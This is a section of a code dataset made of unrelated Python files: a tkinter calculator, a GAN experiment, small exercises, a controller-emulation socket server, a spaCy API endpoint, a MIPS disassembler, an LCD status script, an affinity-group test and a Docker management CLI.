clear()\n display.insert(0, \"Error\")\n\n\n# =========================================================================================================================\n# Step 1\n# Creating entry form\ndisplay = tk.Entry(root)\ndisplay.grid(row=0, columnspan=4, sticky=tk.W+tk.E, padx=3, pady=3)\n\n# Creating buttons\ntk.Button(root, text=\"1\", width=5,\n command=lambda: insertValueToEntryForm(1)).grid(row=1, column=0,) # Used lambda because we need to send data to the function\ntk.Button(root, text=\"2\", width=5,\n command=lambda: insertValueToEntryForm(2)).grid(row=1, column=1,)\ntk.Button(root, text=\"3\", width=5,\n command=lambda: insertValueToEntryForm(3)).grid(row=1, column=2,)\n\ntk.Button(root, text=\"4\", width=5,\n command=lambda: insertValueToEntryForm(4)).grid(row=2, column=0,)\ntk.Button(root, text=\"5\", width=5,\n command=lambda: insertValueToEntryForm(5)).grid(row=2, column=1,)\ntk.Button(root, text=\"6\", width=5,\n command=lambda: insertValueToEntryForm(6)).grid(row=2, column=2,)\n\ntk.Button(root, text=\"7\", width=5,\n command=lambda: insertValueToEntryForm(7)).grid(row=3, column=0,)\ntk.Button(root, text=\"8\", width=5,\n command=lambda: insertValueToEntryForm(8)).grid(row=3, column=1,)\ntk.Button(root, text=\"9\", width=5,\n command=lambda: insertValueToEntryForm(9)).grid(row=3, column=2,)\n\n# Adding other elements\ntk.Button(root, text=\"AC\", width=5, command=clear).grid(row=4, column=0,)\ntk.Button(root, text=\"0\", width=5,\n command=lambda: insertValueToEntryForm(0)).grid(row=4, column=1,)\ntk.Button(root, text=\"=\", width=5, command=calculate).grid(row=4, column=2,)\n\n# Adding operators\ntk.Button(root, text=\"+\", width=5,\n command=lambda: insertValueToEntryForm('+')).grid(row=1, column=3,)\ntk.Button(root, text=\"-\", width=5,\n command=lambda: insertValueToEntryForm('-')).grid(row=2, column=3,)\ntk.Button(root, text=\"*\", width=5,\n command=lambda: insertValueToEntryForm('*')).grid(row=3, column=3,)\ntk.Button(root, text=\"/\", width=5,\n command=lambda: insertValueToEntryForm('/')).grid(row=4, column=3,)\n\n\nroot.mainloop()\n","sub_path":"src/gui/projects/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"483228643","text":"import numpy as np\nfrom scipy.stats import norm\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport copy\n\nseed = 42\nnp.random.seed(seed)\ntf.set_random_seed(seed)\n\n# real data\nclass DataDistribution(object):\n def __init__(self, N=1000):\n self.mu = 4\n self.sigma = 0.5\n\n def sample(self, N):\n samples = np.random.normal(self.mu, self.sigma, N)\n samples.sort()\n return samples\n\n def batch(self, batch_size=10):\n sample_size = self.samples.shape[0]\n batch_mask = np.random.choice(sample_size, batch_size)\n return batch_mask\n\nclass GeneratorDistribution(object):\n def __init__(self, range):\n self.range = range\n\n def sample(self, N):\n return np.linspace(-self.range, self.range, N) + \\\n np.random.random(N) * 0.01\n\n# dataset parameter\nmu = 4\nsigma = 0.5\n\n# trainning parameter\ninitial_learning_rate = 0.005\nbatch = tf.Variable(0)\ndecay = 0.95\nnum_decay_steps = 150\n\n# 학습이 안되다가, 이 구문 추가하니까 pre_train 수렴\nlearning_rate = tf.train.exponential_decay(\n initial_learning_rate,\n batch,\n num_decay_steps,\n decay,\n staircase=True\n )\nepoch = 5\nbatch_size = 10\n\n# network parameter\nn_hidden = 4\nn_input = 1\nn_classes = 1\n\n# generator\ndef generator(x, weights, biases):\n layer_1 = tf.add(tf.matmul(x, weights['g_layer1']), biases['g_b1'])\n layer_1 = tf.nn.softplus(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['g_layer2']), biases['g_b2'])\n layer_2 = tf.nn.softplus(layer_2)\n\n out_layer = tf.matmul(layer_2, weights['g_out']) + biases['g_bout']\n return out_layer\n\n# discriminator\ndef pre_discriminator(x, weights, biases):\n layer_1 = tf.add(tf.matmul(x, weights['pre_d_layer1']), biases['pre_d_b1'])\n layer_1 = tf.tanh(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['pre_d_layer2']), biases['pre_d_b2'])\n layer_2 = tf.tanh(layer_2)\n layer_3 = tf.add(tf.matmul(layer_2, weights['pre_d_layer3']), biases['pre_d_b3'])\n layer_3 = tf.tanh(layer_3)\n\n out_layer = tf.matmul(layer_3, weights['pre_d_outlayer']) + biases['pre_d_bout']\n out_layer = tf.sigmoid(out_layer)\n return out_layer\n\ndef discriminator_d(x, weights, biases):\n layer_1 = tf.add(tf.matmul(x, weights['d_layer1']), biases['d_b1'])\n layer_1 = tf.tanh(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['d_layer2']), biases['d_b2'])\n layer_2 = tf.tanh(layer_2)\n layer_3 = tf.add(tf.matmul(layer_2, weights['d_layer3']), biases['d_b3'])\n layer_3 = tf.tanh(layer_3)\n\n out_layer = tf.matmul(layer_3, weights['d_outlayer']) + biases['d_bout']\n out_layer = tf.sigmoid(out_layer)\n return out_layer\n\n# Store layers weight & bias\nweights = {\n 'pre_d_layer1': tf.Variable(tf.random_normal([n_input, n_hidden])),\n 'pre_d_layer2': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'pre_d_layer3': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'pre_d_outlayer': tf.Variable(tf.random_normal([n_hidden, n_classes])),\n\n 'd_layer1': tf.Variable(tf.random_normal([n_input, n_hidden])),\n 'd_layer2': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'd_layer3': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'd_outlayer': tf.Variable(tf.random_normal([n_hidden, n_classes])),\n\n 'g_layer1': tf.Variable(tf.random_normal([n_input, n_hidden])),\n 'g_layer2': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'g_out': tf.Variable(tf.random_normal([n_hidden, n_classes]))\n}\n\nbiases = {\n 'pre_d_b1': tf.Variable(tf.random_normal([n_hidden])),\n 'pre_d_b2': tf.Variable(tf.random_normal([n_hidden])),\n 'pre_d_b3': tf.Variable(tf.random_normal([n_hidden])),\n 'pre_d_bout': tf.Variable(tf.random_normal([n_classes])),\n\n 'd_b1': tf.Variable(tf.random_normal([n_hidden])),\n 'd_b2': tf.Variable(tf.random_normal([n_hidden])),\n 'd_b3': tf.Variable(tf.random_normal([n_hidden])),\n 'd_bout': tf.Variable(tf.random_normal([n_classes])),\n\n 'g_b1': tf.Variable(tf.random_normal([n_hidden])),\n 'g_b2': tf.Variable(tf.random_normal([n_hidden])),\n 'g_bout': tf.Variable(tf.random_normal([n_classes]))\n}\n\n# PreTrained Discriminative Model\npre_input = tf.placeholder(tf.float32, shape=(batch_size, 1))\npre_labels = tf.placeholder(tf.float32, shape=(batch_size, 1))\npre_d = pre_discriminator(pre_input, weights, biases)\n\npre_loss = tf.reduce_mean(tf.square(pre_labels - pre_d))\npre_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(pre_loss)\n\n# Generative Model\nz = tf.placeholder(tf.float32, shape=(batch_size, 1))\nG = generator(z, weights, biases)\n\n# Discriminative Model\n\nx = tf.placeholder(tf.float32, shape=(batch_size, 1))\nD1 = discriminator_d(x, weights, biases)\nD2 = discriminator_d(G, weights, biases)\n\nloss_d = tf.reduce_mean(-tf.log(D1) - tf.log(1-D2))\nloss_g = tf.reduce_mean(-tf.log(D2))\n\nopt_d = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss_d)\nopt_g = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss_g)\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\ndataset = DataDistribution()\nnum_steps = 1200\n\ndata = DataDistribution()\ngen = GeneratorDistribution(range=8)\n\nresult = []\nright_data = []\npre_train_right_data = []\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n\n # pretraining discriminator\n num_pretrain_steps = 2000\n print(\"Pre Train--------------------------------------------------------------------------------------------------\")\n for step in range(num_pretrain_steps):\n print(\"-------------------------------------------------------------------------------------------------------\")\n d = (np.random.random(batch_size) -0.5) * 10\n labels = norm.pdf(d, loc = mu, scale = sigma)\n print(d)\n print(labels)\n pretrain_loss, _ = sess.run([pre_loss, pre_opt], {\n pre_input : np.reshape(d, (batch_size, 1)),\n pre_labels : np.reshape(labels, (batch_size, 1))\n })\n\n print(\"epoch {} : cost : {}\".format(step, pretrain_loss))\n print(\"-------------------------------------------------------------------------------------------------------\")\n print(\"Finished Pre Train ----------------------------------------------------------------------------------------\")\n print(\"mu : {}\".format(mu))\n print(\"sigma : {}\".format(sigma))\n for i in range(0,5):\n validate_d = (np.random.random(batch_size) - 0.5) * 10\n validate_labels = norm.pdf(validate_d, loc=mu, scale=sigma)\n pre_train_result = sess.run([pre_d], {\n pre_input : np.reshape(validate_d, (batch_size, 1))\n })\n\n print(validate_d)\n print(validate_labels)\n print(pre_train_result)\n exit()\n print()\n print()\n # copy weights\n # test copy data\n print(\"Copy weights and biases -----------------------------------------------------------------------------------\")\n\n weights['d_layer1'].assign(weights['pre_d_layer1'])\n weights['d_layer2'].assign(weights['pre_d_layer2'])\n weights['d_layer3'].assign(weights['pre_d_layer3'])\n weights['d_outlayer'].assign(weights['pre_d_outlayer'])\n\n # copy bias\n biases['d_b1'].assign(biases['pre_d_b1'])\n biases['d_b2'].assign(biases['pre_d_b2'])\n biases['d_b3'].assign(biases['pre_d_b3'])\n biases['d_bout'].assign(biases['pre_d_bout'])\n\n print(\"Finished weights and biases -------------------------------------------------------------------------------\")\n\n # update discriminator\n for step in range(num_steps):\n right = data.sample(batch_size)\n random = gen.sample(batch_size)\n\n loss_disciminator, _ = sess.run([loss_d, opt_d], {\n x : np.reshape(right, (batch_size, 1)),\n z : np.reshape(random, (batch_size, 1))\n })\n\n # update generator\n random = gen.sample(batch_size)\n\n loss_generator, _ = sess.run([loss_g, opt_g], {\n z: np.reshape(random, (batch_size, 1))\n })\n\n if step% 10 == 0:\n print('epoch {}: loss d -> {}\\t\\tloss_g -> {}'.format(str(step), str(loss_disciminator), str(loss_generator)))\n\n\n random = gen.sample(batch_size)\n data = sess.run([G],{\n z : np.reshape(random, (batch_size, 1))\n })\n result.append(data)\n\n print(\"Check Weights and Biases : \")\n print(\"pre_d_layer1 : {}\".format(str(sess.run(weights['pre_d_layer1']))))\n print(\"pre_d_layer2 : {}\".format(str(sess.run(weights['pre_d_layer2']))))\n print(\"pre_d_outlayer : {}\".format(str(sess.run(weights['pre_d_outlayer']))))\n print()\n print(\"d1_layer1 : {}\".format(str(sess.run(weights['d_layer1']))))\n print(\"d1_layer2 : {}\".format(str(sess.run(weights['d_layer2']))))\n print(\"d1_outlayer : {}\".format(str(sess.run(weights['d_outlayer']))))\n print()\n print(\"g1 : {}\".format(str(sess.run(weights['g_layer1']))))\n print(\"g2 : {}\".format(str(sess.run(weights['g_layer2']))))\n print(\"g_out : {}\".format(str(sess.run(weights['g_out']))))\n print()\n\n\nprint(\"-------------------------------------------\")\nright_data = dataset.sample(10)\nprint(right_data)\nprint(\"-------------------------------------------\")\nprint(result)\n","sub_path":"test/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":9204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393733944","text":"from math import sqrt\n\n\ndef pcs(v1, v2):\n n = len(v1)\n\n # 按人计算评分数的和\n sum_a = sum(v1)\n sum_b = sum(v2)\n\n # 计算平方的和\n sum_a_sq = sum([sqrt(item) for item in v1])\n sum_b_sq = sum([sqrt(item) for item in v2])\n\n # 计算乘积和\n p_sum = sum([v1[idx] * v2[idx] for idx in range(len(v1))])\n\n # 计算皮尔逊相关度\n num = p_sum - (sum_a * sum_b / n)\n\n result = (sum_a_sq - pow(sum_a, 2) / n) * (sum_b_sq - pow(sum_b, 2) / n)\n\n if result <= 0:\n return 0\n\n den = sqrt(result)\n if den == 0:\n return 0\n\n return 1.0 - num / den\n","sub_path":"c3/Score.py","file_name":"Score.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"418191858","text":"import pyxinput\nfrom PropertiesReader import PropertiesReader\nfrom threading import Thread\nimport json\n\nclass ServerExecutor(Thread):\n\n prop_reader = PropertiesReader(\"prop.json\")\n PACKET_LENGTH = 170 # in bytes\n\n def __init__(self, socket, id_controller):\n super().__init__()\n self.socket = socket\n self.id_controller = id_controller\n self.events_code = ServerExecutor.prop_reader.props()\n def __str__(self):\n return self.socket.getsockname()\n\n def run(self):\n virtualController = pyxinput.vController() # initialize virtual controller\n\n dataJson = self.socket.recv(ServerExecutor.PACKET_LENGTH)\n self.socket.send(\"1\".encode())\n while(dataJson):\n data = json.loads(dataJson)\n decoded_code = self.events_code[data[\"event_code\"]]\n virtualController.set_value(decoded_code, data[\"event_state\"])\n \n print(\"[Controller-ID #{}] Ping precedent packet: {} milliseconds\".format(self.id_controller, data[\"previous_ping\"]))\n dataJson = self.socket.recv(ServerExecutor.PACKET_LENGTH)\n self.socket.send(\"1\".encode())\n else:\n print(\"[INFO] Connection with {} interrupted.\".format(self.id_controller))","sub_path":"ServerExecutor.py","file_name":"ServerExecutor.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119824945","text":"\nimport spacy\nfrom fastapi import APIRouter, Body, Depends\nfrom pydantic import BaseModel, Field\n\nrouter = APIRouter()\n\n\nclass Mensaje(BaseModel):\n texto: str\n\n\nclass Consulta(BaseModel):\n pregunta: str\n texto: str\n\n\n@router.post(\"/entidades\", response_description=\"NLP data retrieved\")\nasync def get_entidades_from_texto(mensaje: Mensaje):\n nlp = spacy.load(\"es_core_news_sm\")\n entidades = []\n\n doc = nlp(mensaje.texto[11:])\n\n for token in doc:\n if token.tag_ == \"PROPN\" and token.pos_ == \"PROPN\" and len(token.shape_) >= 4:\n entidades.append(token.text)\n # entidades.append(\n # {token.text: {\"tag\": token.tag_, \"pos\": token.pos_, \"shape\": token.shape_}})\n\n return {\n \"Entidades\": entidades,\n \"Mensaje Resultante\": ' '.join(str(e) for e in entidades),\n \"Mensaje Inicial\": mensaje.texto,\n }\n\n","sub_path":"server/routes/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320119439","text":"#MRMenu = {}\n\n#signal = input(\"Type here: \")\n#data = input(\"Data here: \")\n\n\n#MRMenu[signal] = data\n#print(MRMenu[signal])\n\n\n#for x, y in MRMenu.items():\n# print(x, y) \n\nWaifu = {}\n\n# because git told me to :(\n\nfor i in range(0,5):\n potato = input(\"This is a potato\")\n Waifu[i] = potato\n\nfor x,y in Waifu.items():\n print(x,y)\n","sub_path":"dictionary-test/dictionary_test.py","file_name":"dictionary_test.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"191961026","text":"__author__ = 'Benco'\nclass Solution:\n # @param s, a string\n # @return a boolean\n def isPalindrome(self, s):\n s1=''\n for i in range(len(s)):\n if (s[i].upper()>='A' and s[i].upper()<='Z') or (s[i]>='0' and s[i]<='9'):\n s1+=s[i].upper()\n #print(s1)\n s2=s1[::-1]\n if s1==s2:\n return True\n else:\n return False\n\nif __name__==\"__main__\":\n s=Solution()\n print(s.isPalindrome('aA'))","sub_path":"Valid Palindrome.py","file_name":"Valid Palindrome.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357470797","text":"from stuubehoggr.core import ConfigurationParser\nfrom stuubehoggr import commands\nfrom stuubehoggr.utils import logger\nimport logging\nimport sys\nimport click\n\n\n@click.group()\n@click.option('--log-level', type=click.Choice(['INFO', 'DEBUG', 'WARNING',\n 'ERRPR', 'CRITICAL']), default='CRITICAL')\n@click.option('--log-level', '-l', default='INFO')\ndef cli(log_level):\n logger.setLevel(getattr(logging, log_level))\n\n\ndef run_command(command, cwd, name, reverse=False, muted=False):\n # Parse the configuration\n parser = core.ConfigurationParser(cwd)\n parser.parse()\n\n # Initialize the command\n docker_client = commands.create_default_docker_client()\n cmd = command(docker_client)\n\n containers = parser.container_list[:]\n if reverse:\n containers = reversed(containers)\n\n # Find the container with the given name and run it.\n for current in containers:\n try:\n if name is None or current['name'] == name:\n if cmd.run(current):\n if not muted:\n log_operation_complete(command.name, current['name'])\n else:\n # TODO: the run method shall return nothing. Failture\n # must ALLWAYS result in an exception!\n log_error(command.name, current['name'], None)\n sys.exit(1)\n except Exception as e:\n log_error(command.name, current['name'], e)\n sys.exit(1)\n\n # TODO: handle nonexisting container...\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef stop(container, working_directory):\n run_command(commands.StopCommand, working_directory, container,\n reverse=True)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef start(container, working_directory):\n run_command(commands.StartCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef build(container, working_directory):\n run_command(commands.BuildCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef launch(container, working_directory):\n run_command(commands.LaunchCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef destroy(container, working_directory):\n run_command(commands.DestroyCommand, working_directory, container,\n reverse=True)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef backup(container, working_directory):\n run_command(commands.BackupCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef restore(container, working_directory):\n run_command(commands.RestoreCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef bootstrap(container, working_directory):\n run_command(commands.StopCommand, working_directory, container,\n reverse=True, muted=True)\n run_command(commands.BackupCommand, working_directory, container,\n reverse=True, muted=True)\n run_command(commands.DestroyCommand, working_directory, container,\n reverse=True, muted=True)\n run_command(commands.BootstrapCommand, working_directory, container)\n\n\n# Special commands\n\n@cli.command(name='list')\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\n@click.option('--reverse', default=False, is_flag=True)\ndef listAll(working_directory, reverse):\n parser = core.ConfigurationParser(working_directory)\n parser.parse()\n containers = parser.container_list[:]\n if reverse:\n containers = reversed(containers)\n for container in containers:\n click.echo(container['name'])\n\n\ndef abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()\n\n\n@cli.command()\n@click.option('--yes', is_flag=True, callback=abort_if_false,\n expose_value=False,\n prompt='Are you sure you want to clear all docker realted '\n 'Data on this system (including all volumes/images etc.)?')\ndef tabularasa():\n # TODO: CONFIRM!\n client = commands.create_default_docker_client()\n commands.tabularasa(client)\n\n\n@cli.command()\n@click.argument('container', required=True)\ndef clean(container):\n client = commands.create_default_docker_client()\n commands.cleanup_recursively(client, container)\n\n\ndef log_operation_complete(operation, container_name):\n if logger.getEffectiveLevel() != logging.CRITICAL:\n logger.info('Operation \"%s\" completed for \"%s\"'\n % (operation, container_name))\n else:\n click.echo(container_name, err=True)\n\n\ndef log_error(operation, container_name, exception):\n if logger.getEffectiveLevel() is not logging.CRITICAL:\n logger.error('Operation \"%s\" for \"%s\" has failed.'\n % (operation, container_name))\n if exception:\n raise exception\n else:\n click.echo('ERROR: %s' % e)\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"src/main/python/stuubehoggr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"116014216","text":"import time\nimport datetime\nimport random\n\nmessages = [\n \"of all the trees we could've hit, we had to get one that hits .\",\n \"If he doesn't stop trying to save your life he's going to kill \"\n]\n\nprint(\"Typing speed test. Type the following message. I will time you\")\ntime.sleep(2)\nprint(\"\\nReady\")\ntime.sleep(1)\nprint(\"\\nSet...\")\ntime.sleep(1)\nprint(\"\\nGo\")\nmessage = random.choice(messages)\nprint(\"\\n\" + message)\nstart_time = datetime.datetime.now()\ntyping = raw_input('>')\nend_time = datetime.datetime.now()\n","sub_path":"speedTest.py","file_name":"speedTest.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"400128216","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"Michael Lore \"\n__date__ = \"$Jun 21, 2015 9:41:46 PM$\"\n\nfirst = input(\"Enter a number\")\nnum1 = int(first)\nsecond = input(\"Enter another number\")\nnum2 = int(second)\nsum = num1 + num2\nprint (sum)","sub_path":"codeabbey/sum2/src/sum2.py","file_name":"sum2.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"129675685","text":"\"\"\"\n LeetCode \n By Solmaz Ebrahimi\n \n Longest Palindromic Substring Problem\n https://leetcode.com/problems/longest-palindromic-substring\n \n Time Submitted | Status | Runtime | Memory | Language\n 2020/05/29 | Accepted | 4372 ms\t| 13.8 MB | python3\n\"\"\"\n\n\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n \n longest_sub = ''\n \n for i in range(len(s)):\n if (len(s) - i) < len(longest_sub):\n break\n for j in range(i+1, len(s)+1):\n sub = s[i:j]\n if sub == sub[::-1]:\n if len(sub) > len(longest_sub):\n longest_sub = sub \n return longest_sub","sub_path":"5.Longest Palindromic Substring.py","file_name":"5.Longest Palindromic Substring.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"49588933","text":"#在本文件相同路径下存放十六进制机器码文件hex.txt,每条语句一行。\n#直接运行python deassemble.py即可,目前只支持P3课下的8条指令。\ndef hex2bin(hexfile): \n f=open(hexfile,\"r\")\n lines = f.readlines()\n binlines=[]\n binstrs=[]\n for line in lines:\n line = line.split(\"\\n\")[0]\n num=\"0x\"+line\n #print(num)\n #print(bin(int(num,16)))\n binlines.append(str(bin(int(num,16))))\n for binstr in binlines:\n binstr=binstr.split(\"b\")[-1];\n i=len(binstr)\n while (i<32):\n binstr = \"0\" + binstr\n i = len(binstr)\n binstrs.append(binstr)\n for binstr in binstrs:\n print(binstr)\n return binstrs\ndef bin2signdec(string): #16为有符号二进制数转换成十进制\n udec = int(string,2)\n strdec = str(udec)\n if(string[0]==\"1\"):\n dec = (~(udec)+1)%65536\n strdec = \"-\" + str(dec)\n return strdec\n#__main__\nbinstrs = hex2bin(\"hex.txt\")\ninstructions = []\nfor binstr in binstrs:\n fields = [];\n fields.append(binstr[0:6])\n fields.append(binstr[6:11])\n fields.append(binstr[11:16])\n fields.append(binstr[16:21])\n fields.append(binstr[21:26])\n fields.append(binstr[26:32])\n if(fields[0]==\"000000\"):\n if(fields[5]==\"100001\"): #ADDU\n instruction = \"addu\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n rd = str(int(fields[3],2))\n instruction = instruction + \" $\" + rd + \" $\" + rs + \" $\" + rt\n instructions.append(instruction)\n elif(fields[5]==\"100011\"): #SUBU\n instruction = \"subu\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n rd = str(int(fields[3],2))\n instruction = instruction + \" $\" + rd + \" $\" + rs + \" $\" + rt\n instructions.append(instruction)\n elif(fields[5]==\"000000\"): #nop\n instructions.append(\"nop\")\n else:\n instructions.append(binstr)\n elif(fields[0]==\"001101\"): #ORI\n instruction = \"ori\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n immediate = str(int(fields[3]+fields[4]+fields[5],2))\n instruction = instruction + \" $\" + rt + \" $\" + rs + \" \" + immediate\n instructions.append(instruction)\n elif(fields[0]==\"100011\"): #lw\n instruction = \"lw\"\n base = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n offset = bin2signdec(fields[3]+fields[4]+fields[5])\n instruction = instruction + \" $\" + rt + \" \" + offset + \"($\" + base + \")\"\n instructions.append(instruction)\n elif(fields[0]==\"101011\"): #sw\n instruction = \"sw\"\n base = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n offset = bin2signdec(fields[3]+fields[4]+fields[5])\n instruction = instruction + \" $\" + rt + \" \" + offset + \"($\" + base + \")\"\n instructions.append(instruction)\n elif(fields[0]==\"001111\"): #lui\n instruction = \"lui\"\n rt = str(int(fields[2],2))\n immediate = str(int(fields[3]+fields[4]+fields[5],2))\n instruction = instruction + \" $\" + rt + \" \" + immediate\n instructions.append(instruction)\n elif(fields[0]==\"000100\"): #beq\n instruction = \"beq\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n offset = bin2signdec(fields[3]+fields[4]+fields[5])\n instruction = instruction + \" $\" + rs + \" $\" + rt + \" \" + offset\n instructions.append(instruction)\n else:\n instructions.append(binstr)\n\nfor instruction in instructions:\n print(instruction)\n \n\n \n","sub_path":"P3/deassemble.py","file_name":"deassemble.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"491587461","text":"from subprocess import check_output\nfrom time import sleep\nfrom datetime import datetime\nfrom RPLCD.i2c import CharLCD\nimport os\n\nlcd = CharLCD('PCF8574', 0x3f, auto_linebreaks=False, cols=16, rows=2)\nlcd.clear()\n\ndef get_ip():\n cmd = \"hostname -I | cut -d\\' \\' -f1\"\n return check_output(cmd, shell=True).decode(\"utf-8\").strip()\nwhile True:\n lcd.clear()\n uptime = os.popen('uptime -p').read()[:-1]\n lcd_line_1 = datetime.now().strftime('%b %d %H:%M:%S')\n lcd_line_2 = \"IP \" + get_ip()\n lcd_line_3 = uptime\n output = lcd_line_2 + '\\r\\n' + lcd_line_3\n\n lcd.home()\n lcd.write_string(output)\n sleep(10)\n","sub_path":"lcd_ip.py","file_name":"lcd_ip.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414571268","text":"from bordas import destacar_bordas\n\ndef testar_bordas():\n # crie um exemplo de imagem pequena para testar\n \n largura = 5\n altura = 3\n imagem = [\n ['0', '0', '1', '1', '1'],\n ['0', '0', '1', '1', '1'],\n ['0', '0', '1', '1', '1']\n ]\n\n # cria a matriz de bordas que você espera para essa imagem\n bordas_esperadas = [ \n ['0', '0', '1', '1', '1'],\n ['0', '0', '1', '0', '1'],\n ['0', '0', '1', '1', '1'] \n ]\n\n # aqui chamamos a função sendo testada\n bordas_calculadas = destacar_bordas(largura, altura, imagem)\n\n # isso irá gerar um erro quando a função não estiver correta\n assert bordas_esperadas == bordas_calculadas\n\n # se o programa não falhou, então talvez sua função esteja correta\n\n\ntestar_bordas()\n","sub_path":"tarefa10/testar_bordas.py","file_name":"testar_bordas.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"423982437","text":"'''\r\n\r\nSimulator Test for affinity group antiHard policy.\r\n\r\n@author: Chao\r\n'''\r\n\r\nimport zstackwoodpecker.test_util as test_util\r\nimport zstackwoodpecker.test_lib as test_lib\r\nimport zstackwoodpecker.test_state as test_state\r\nimport zstackwoodpecker.operations.affinitygroup_operations as ag_ops\r\nimport zstackwoodpecker.operations.vm_operations as vm_ops\r\nimport zstackwoodpecker.operations.resource_operations as res_ops\r\nimport os\r\n\r\n\r\ntest_stub = test_lib.lib_get_test_stub()\r\ntest_obj_dict = test_state.TestStateDict()\r\ndef test():\r\n h1_name = os.environ.get(\"hostName\")\r\n cond = res_ops.gen_query_conditions('name', '=', h1_name)\r\n h1 = res_ops.query_resource(res_ops.HOST, cond)\r\n ag1 = ag_ops.create_affinity_group(name=\"ag1\", policy=\"antiHard\")\r\n vm1 = test_stub.create_ag_vm(affinitygroup_uuid=ag1.uuid, host_uuid=h1[0].uuid)\r\n test_obj_dict.add_vm(vm1)\r\n\r\n vm1.stop()\r\n \r\n hosts = vm_ops.get_vm_starting_candidate(vm1.get_vm().uuid, systemtag=[\"affinityGroupUuid::%s\" % ag1.uuid])\r\n assert len(hosts) == 3\r\n test_lib.lib_error_cleanup(test_obj_dict)\r\n ag_ops.delete_affinity_group(ag1.uuid)\r\n test_util.test_pass(\"Affinity Group antiHard policy pass\")\r\n \r\n\r\n#Will be called only if exception happens in test().\r\ndef error_cleanup():\r\n test_lib.lib_error_cleanup(test_obj_dict)\r\n","sub_path":"integrationtest/vm/simulator/affinitygroup/test_shared_antihard_policy12.py","file_name":"test_shared_antihard_policy12.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"394815773","text":"# Copyright (c) 2017 The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, 